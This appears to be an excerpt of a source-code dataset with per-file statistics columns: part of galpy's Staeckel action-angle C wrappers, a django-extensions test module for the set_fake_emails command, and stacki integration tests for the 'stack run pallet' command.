actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (jr,jz,err.value)
def actionAngleStaeckel_calcu0(E,Lz,pot,delta):
"""
NAME:
actionAngleStaeckel_calcu0
PURPOSE:
Use C to calculate u0 in the Staeckel approximation
INPUT:
E, Lz - energy and angular momentum
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
OUTPUT:
(u0,err)
u0 : array, shape (len(E))
err - non-zero if error occured
HISTORY:
2012-12-03 - Written - Bovy (IAS)
"""
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Set up result arrays
u0= numpy.empty(len(E))
err= ctypes.c_int(0)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.calcu0
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [E.flags['F_CONTIGUOUS'],
Lz.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
E= numpy.require(E,dtype=numpy.float64,requirements=['C','W'])
Lz= numpy.require(Lz,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(E),
E,
Lz,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
u0,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: E= numpy.asfortranarray(E)
if f_cont[1]: Lz= numpy.asfortranarray(Lz)
if f_cont[2]: delta= numpy.asfortranarray(delta)
return (u0,err.value)
def actionAngleFreqStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None,order=10):
"""
NAME:
actionAngleFreqStaeckel_c
PURPOSE:
Use C to calculate actions and frequencies
using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,Omegar,Omegaphi,Omegaz,err)
jr,jz,Omegar,Omegaphi,Omegaz : array, shape (len(R))
err - non-zero if error occured
HISTORY:
2013-08-23 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
Omegar= numpy.empty(len(R))
Omegaphi= numpy.empty(len(R))
Omegaz= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actionsFreqs
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
Omegar= numpy.require(Omegar,dtype=numpy.float64,requirements=['C','W'])
Omegaphi= numpy.require(Omegaphi,dtype=numpy.float64,
requirements=['C','W'])
Omegaz= numpy.require(Omegaz,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
Omegar,
Omegaphi,
Omegaz,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (jr,jz,Omegar,Omegaphi,Omegaz,err.value)
def actionAngleFreqAngleStaeckel_c(pot,delta,R,vR,vT,z,vz,phi,
u0=None,order=10):
"""
NAME:
actionAngleFreqAngleStaeckel_c
PURPOSE:
Use C to calculate actions, frequencies, and angles
using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz, phi - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,Omegar,Omegaphi,Omegaz,Angler,Anglephi,Anglez,err)
jr,jz,Omegar,Omegaphi,Omegaz,Angler,Anglephi,Anglez : array, shape (len(R))
err - non-zero if error occured
HISTORY:
2013-08-27 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
Omegar= numpy.empty(len(R))
Omegaphi= numpy.empty(len(R))
Omegaz= numpy.empty(len(R))
Angler= numpy.empty(len(R))
Anglephi= numpy.empty(len(R))
Anglez= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actionsFreqsAngles
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
jr= numpy.require(jr,dtype=numpy.float64,requirements=['C','W'])
jz= numpy.require(jz,dtype=numpy.float64,requirements=['C','W'])
Omegar= numpy.require(Omegar,dtype=numpy.float64,requirements=['C','W'])
Omegaphi= numpy.require(Omegaphi,dtype=numpy.float64,
requirements=['C','W'])
Omegaz= numpy.require(Omegaz,dtype=numpy.float64,requirements=['C','W'])
Angler= numpy.require(Angler,dtype=numpy.float64,requirements=['C','W'])
Anglephi= numpy.require(Anglephi,dtype=numpy.float64,
requirements=['C','W'])
Anglez= numpy.require(Anglez,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
ctypes.c_int(order),
jr,
jz,
Omegar,
Omegaphi,
Omegaz,
Angler,
Anglephi,
Anglez,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
badAngle = Anglephi != 9999.99
Anglephi[badAngle]= (Anglephi[badAngle] + phi[badAngle] % (2.*numpy.pi)) % (2.*numpy.pi)
Anglephi[Anglephi < 0.]+= 2.*numpy.pi
return (jr,jz,Omegar,Omegaphi,Omegaz,Angler,
Anglephi,Anglez,err.value)
def actionAngleUminUmaxVminStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None):
"""
NAME:
actionAngleUminUmaxVminStaeckel_c
PURPOSE:
Use C to calculate umin, umax, and vmin using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
OUTPUT:
(umin,umax,vmin,err)
umin,umax,vmin : array, shape (len(R))
err - non-zero if error occured
HISTORY:
2017-12-12 - Written - Bovy (UofT)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
umin= numpy.empty(len(R))
umax= numpy.empty(len(R))
vmin= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_uminUmaxVmin
actionAngleStaeckel_actionsFunc.argtypes= [ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.int32,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.c_int,
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ndpointer(dtype=numpy.float64,flags=ndarrayFlags),
ctypes.POINTER(ctypes.c_int)]
#Array requirements, first store old order
f_cont= [R.flags['F_CONTIGUOUS'],
vR.flags['F_CONTIGUOUS'],
vT.flags['F_CONTIGUOUS'],
z.flags['F_CONTIGUOUS'],
vz.flags['F_CONTIGUOUS'],
u0.flags['F_CONTIGUOUS'],
delta.flags['F_CONTIGUOUS']]
R= numpy.require(R,dtype=numpy.float64,requirements=['C','W'])
vR= numpy.require(vR,dtype=numpy.float64,requirements=['C','W'])
vT= numpy.require(vT,dtype=numpy.float64,requirements=['C','W'])
z= numpy.require(z,dtype=numpy.float64,requirements=['C','W'])
vz= numpy.require(vz,dtype=numpy.float64,requirements=['C','W'])
u0= numpy.require(u0,dtype=numpy.float64,requirements=['C','W'])
delta= numpy.require(delta,dtype=numpy.float64,requirements=['C','W'])
umin= numpy.require(umin,dtype=numpy.float64,requirements=['C','W'])
umax= numpy.require(umax,dtype=numpy.float64,requirements=['C','W'])
vmin= numpy.require(vmin,dtype=numpy.float64,requirements=['C','W'])
#Run the C code
actionAngleStaeckel_actionsFunc(len(R),
R,
vR,
vT,
z,
vz,
u0,
ctypes.c_int(npot),
pot_type,
pot_args,
ctypes.c_int(ndelta),
delta,
umin,
umax,
vmin,
ctypes.byref(err))
#Reset input arrays
if f_cont[0]: R= numpy.asfortranarray(R)
if f_cont[1]: vR= numpy.asfortranarray(vR)
if f_cont[2]: vT= numpy.asfortranarray(vT)
if f_cont[3]: z= numpy.asfortranarray(z)
if f_cont[4]: vz= numpy.asfortranarray(vz)
if f_cont[5]: u0= numpy.asfortranarray(u0)
if f_cont[6]: delta= numpy.asfortranarray(delta)
return (umin,umax,vmin,err.value)
| 43.812834
| 139
| 0.5475
| 2,641
| 24,579
| 5.005301
| 0.077243
| 0.083214
| 0.135033
| 0.108178
| 0.873137
| 0.86648
| 0.848324
| 0.838717
| 0.832589
| 0.814509
| 0
| 0.023753
| 0.343993
| 24,579
| 560
| 140
| 43.891071
| 0.79608
| 0.134261
| 0
| 0.804569
| 0
| 0
| 0.038616
| 0.005031
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01269
| false
| 0
| 0.038071
| 0
| 0.063452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13dced776a9ba6618afd87965a36b4b0ebc5ae16
| 4,998
|
py
|
Python
|
tests/management/commands/test_set_fake_emails.py
|
Ardenine/django-extensions
|
8fe05a73e9e09e8fe3206f4b5044bd7b3bad4f7c
|
[
"MIT"
] | null | null | null |
tests/management/commands/test_set_fake_emails.py
|
Ardenine/django-extensions
|
8fe05a73e9e09e8fe3206f4b5044bd7b3bad4f7c
|
[
"MIT"
] | null | null | null |
tests/management/commands/test_set_fake_emails.py
|
Ardenine/django-extensions
|
8fe05a73e9e09e8fe3206f4b5044bd7b3bad4f7c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management import call_command, CommandError
from django.contrib.auth.models import User
from django.utils.six import StringIO
from django_extensions.management.commands.set_fake_emails import Command
import pytest
@pytest.fixture(scope='module') # noqa
def django_db_setup(django_db_setup, django_db_blocker): # noqa
"""Load to database a set of users, create for export
emails command testing"""
with django_db_blocker.unblock(): # noqa
call_command('loaddata', 'group.json')
call_command('loaddata', 'user.json')
@pytest.mark.django_db()
def test_without_args(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails'])
out, err = capsys.readouterr()
assert 'Changed 3 emails' in out
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_no_admin(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '-a'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
@pytest.mark.django_db()
def test_include_groups(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--include-groups=Attendees'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
@pytest.mark.django_db()
def test_exclude_groups(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--exclude-groups=Attendees'])
out, err = capsys.readouterr()
assert 'Changed 1 emails' in out
emails = User.objects.filter(is_superuser=False).values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.filter(is_superuser=True).values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_include_regexp(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--include=.*briel'])
out, err = capsys.readouterr()
assert 'Changed 1 emails' in out
emails = User.objects.exclude(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.filter(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
@pytest.mark.django_db()
def test_exclude_regexp(capsys, settings):
settings.DEBUG = True
emails = User.objects.values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
generate_password = Command()
generate_password.run_from_argv(['manage.py', 'set_fake_emails', '--exclude=.*briel'])
out, err = capsys.readouterr()
assert 'Changed 2 emails' in out
emails = User.objects.filter(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@gmail.com") for email in emails)
emails = User.objects.exclude(username="Gabriel").values_list('email', flat=True)
assert all(email.endswith("@example.com") for email in emails)
def test_without_debug(settings):
settings.DEBUG = False
out = StringIO()
with pytest.raises(CommandError, message="Only available in debug mod"):
call_command('set_fake_emails', verbosity=3, stdout=out, stderr=out)
| 36.217391
| 99
| 0.720088
| 686
| 4,998
| 5.099125
| 0.153061
| 0.048599
| 0.082619
| 0.092338
| 0.825043
| 0.815323
| 0.795026
| 0.792167
| 0.783591
| 0.783591
| 0
| 0.001875
| 0.146459
| 4,998
| 137
| 100
| 36.481752
| 0.818097
| 0.022209
| 0
| 0.684783
| 0
| 0
| 0.14485
| 0.010669
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.086957
| false
| 0.130435
| 0.065217
| 0
| 0.152174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
13e3bdab2e90d8d5550c3b9242e53aa1246fcb89
| 3,948
|
py
|
Python
|
test-framework/test-suites/integration/tests/run/test_run_pallet.py
|
knutsonchris/stacki
|
33087dd5fa311984a66ccecfeee6f9c2c25f665d
|
[
"BSD-3-Clause"
] | null | null | null |
test-framework/test-suites/integration/tests/run/test_run_pallet.py
|
knutsonchris/stacki
|
33087dd5fa311984a66ccecfeee6f9c2c25f665d
|
[
"BSD-3-Clause"
] | null | null | null |
test-framework/test-suites/integration/tests/run/test_run_pallet.py
|
knutsonchris/stacki
|
33087dd5fa311984a66ccecfeee6f9c2c25f665d
|
[
"BSD-3-Clause"
] | null | null | null |
import json
from textwrap import dedent
class TestRunPallet:
def test_invalid_pallet(self, host):
result = host.run('stack run pallet test')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "test" argument is not a valid pallet
{pallet ...} [arch=string] [os=string] [release=string] [version=string]
''')
def test_no_args(self, host):
result = host.run('stack run pallet')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "pallet" argument is required
{pallet ...} [arch=string] [os=string] [release=string] [version=string]
''')
def test_not_enabled(self, host, host_os, create_pallet_isos, revert_export_stack_pallets):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/minimal-1.0-sles12.x86_64.disk1.iso'
)
assert result.rc == 0
# Make sure we get an error that the pallet isn't enabled
result = host.run(f'stack run pallet minimal')
assert result.rc == 255
assert result.stderr == 'error - minimal is not enabled for the frontend\n'
def test_one_arg(self, host, revert_export_stack_carts):
# Make sure the top of the output matches what we expect
result = host.run('script -qfec "stack run pallet stacki" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Run it through "bash -n" to do a syntax sanity check
result = host.run('script -qfec "stack run pallet stacki" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_multiple_args(self, host, host_os, create_pallet_isos, revert_etc, revert_export_stack_pallets, revert_export_stack_carts):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/test_1-{host_os}-1.0-prod.x86_64.disk1.iso'
)
assert result.rc == 0
# Add the pallet to the default box
result = host.run(f'stack enable pallet test_1-{host_os}')
assert result.rc == 0
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Make sure the top of the output matches what we expect
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os}" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Run it through "bash -n" to do a syntax sanity check
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os}" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_database_false(self, host, host_os, create_pallet_isos, revert_etc, revert_export_stack_pallets, revert_export_stack_carts):
# Add our test pallet
result = host.run(
f'stack add pallet {create_pallet_isos}/test_1-{host_os}-1.0-prod.x86_64.disk1.iso'
)
assert result.rc == 0
# Add the pallet to the default box
result = host.run(f'stack enable pallet test_1-{host_os}')
assert result.rc == 0
# Note: The code has a test for isatty so we have to trick the
# run pallet command to think it has a tty
# Make sure the top of the output matches what we expect
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os} database=false" - | tr -d "\r" | head -n 1')
assert result.rc == 0
assert result.stdout == '#! /bin/bash\n'
# Run it through "bash -n" to do a syntax sanity check
result = host.run(f'script -qfec "stack run pallet stacki test_1-{host_os} database=false" - | tr -d "\r" | bash -n')
assert result.rc == 0
assert result.stdout == ''
def test_no_tty_xml_error(self, host, host_os):
# Run the command, passing false for database to skip the pallet
# check and feed it bad XML
result = host.run('echo "test" | stack run pallet database=false')
assert result.rc == 0
assert result.stderr == 'error - OS name not specified in profile\n'
| 38.705882
| 134
| 0.695289
| 660
| 3,948
| 4.051515
| 0.178788
| 0.112191
| 0.072924
| 0.067315
| 0.801795
| 0.79469
| 0.784592
| 0.771503
| 0.721391
| 0.686986
| 0
| 0.017166
| 0.18845
| 3,948
| 101
| 135
| 39.089109
| 0.817416
| 0.22847
| 0
| 0.548387
| 0
| 0.16129
| 0.421818
| 0.060165
| 0
| 0
| 0
| 0
| 0.403226
| 1
| 0.112903
| false
| 0
| 0.032258
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.